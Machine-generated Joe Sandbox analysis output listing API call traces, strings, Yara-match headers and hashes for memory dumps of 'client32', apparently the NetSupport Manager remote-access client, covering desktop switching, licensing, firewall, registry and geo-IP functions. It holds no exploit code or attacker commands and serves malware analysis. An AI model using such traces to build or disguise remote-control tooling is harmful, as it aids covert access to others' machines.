                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                                                                                                  • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                                                                                  • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                                                                                                  • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                                                                                  • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                                                                                  • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                                                                                                • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                                                • API String ID: 3930710499-403456261

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                • PostMessageA.USER32(000802A6,000006CF,00000007,00000000), ref: 11138E0F
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • SetWindowTextA.USER32(000802A6,00000000), ref: 11138EB7
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11138F7C
                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11138FAA
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 11138FE7
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139038
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139045
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000000), ref: 11139059
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000000), ref: 11138FBF
                                                                                                                                                                  • Part of subcall function 11131210: ShowWindow.USER32(000802A6,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 1113906D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                                • API String ID: 3453649892-3803836183

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • wsprintfA.USER32 ref: 11028214
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                                                                                                • wsprintfA.USER32 ref: 11028291
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                                                • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                                • API String ID: 512045693-419896573
                                                                                                                                                                • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                                                                                • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                                                                                                • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                                                                                • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL,59FD48C0,033B6EC0,033B6EB0,?,00000000,1118276C,000000FF,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085E45
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                                                                                                • wsprintfA.USER32 ref: 11085F1B
                                                                                                                                                                • wsprintfA.USER32 ref: 11085F32
                                                                                                                                                                • wsprintfA.USER32 ref: 11085F49
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                                                                                                  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085A98
                                                                                                                                                                  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085AAB
                                                                                                                                                                  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085ABE
                                                                                                                                                                  • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085AD1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                                • API String ID: 4263811268-2492245516
                                                                                                                                                                • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                                                                                • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                                                                                                • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                                                                                • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                                                                                                APIs
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                                • API String ID: 2061479752-1320826866
                                                                                                                                                                • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                                                                                • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                                                                                                • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                                                                                • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1102C574
                                                                                                                                                                  • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                                • API String ID: 596640303-1725438197
                                                                                                                                                                • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                                                                                • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                                                                                                • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                                                                                • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                                                                                                  • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                                                                                  • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                • API String ID: 2823542970-1528906934
                                                                                                                                                                • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                                                                                • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                                                                                                • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                                                                                • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11137692
                                                                                                                                                                  • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                                                                                  • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                                                                                  • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                                                                                  • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111376A1
                                                                                                                                                                • _memset.LIBCMT ref: 111376E3
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                                                                                                • _strrchr.LIBCMT ref: 11137708
                                                                                                                                                                • _free.LIBCMT ref: 1113775A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                                                • API String ID: 711243594-1270230032
                                                                                                                                                                • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                                                                                • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                                                                                • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                                                                                                • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                                                                                                • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                                                                                                • GetDC.USER32(00000000), ref: 11133F03
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                                                                                                • CreateWindowExA.USER32(00000001,NSMWClass,033A0598,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                                                                • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                                • API String ID: 1594747848-1114959992
                                                                                                                                                                • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                                                                                • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                                                                                                • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                                                                                • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                                                                                                APIs
                                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,59FD48C0,?,00000000,00000000), ref: 1102CE44
                                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                                • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 11132C60
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11132C91
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                                                APIs
                                                                                                                                                                • _strtok.LIBCMT ref: 11026C26
                                                                                                                                                                • _strtok.LIBCMT ref: 11026C60
                                                                                                                                                                • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strtok$Sleep
                                                                                                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                                                                                                • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                                                                                                • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                                                                                                • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11102CB1
                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11102CCF
                                                                                                                                                                Strings
                                                                                                                                                                • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                                                                                                • wsprintfA.USER32 ref: 1115E3C8
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                                                • API String ID: 1734919802-1728070458
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1111013A
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                                                • API String ID: 1976012330-1024648535
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,59FD48C0,00000000,?,00000000), ref: 11060874
                                                                                                                                                                • _malloc.LIBCMT ref: 110608BB
